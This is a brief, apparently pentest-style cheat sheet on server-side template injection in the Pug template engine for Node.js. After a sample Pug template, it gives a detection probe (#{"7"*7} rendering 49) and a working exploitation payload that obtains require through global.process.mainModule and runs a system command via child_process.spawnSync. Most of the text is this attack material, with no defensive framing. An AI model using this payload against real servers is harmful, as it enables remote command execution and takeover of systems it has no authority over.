Discovery
The server will run Node.js in the back-end.
Pug code example:
html
head
title Greetings, #{userName}
body
h1 Greetings, #{userName}
input(type='hidden' name='userType' value='guest')
if showGreetings
- const greetings = ['Hello', 'Hi', 'Welcome']
p The greetings are:
each greeting in greetings
p= greeting
else
p No greetings for you!
Input
#{"7"*7}
Output
<49>
Exploitation
- var require = global.process.mainModule.require
= require('child_process').spawnSync('whoami').stdout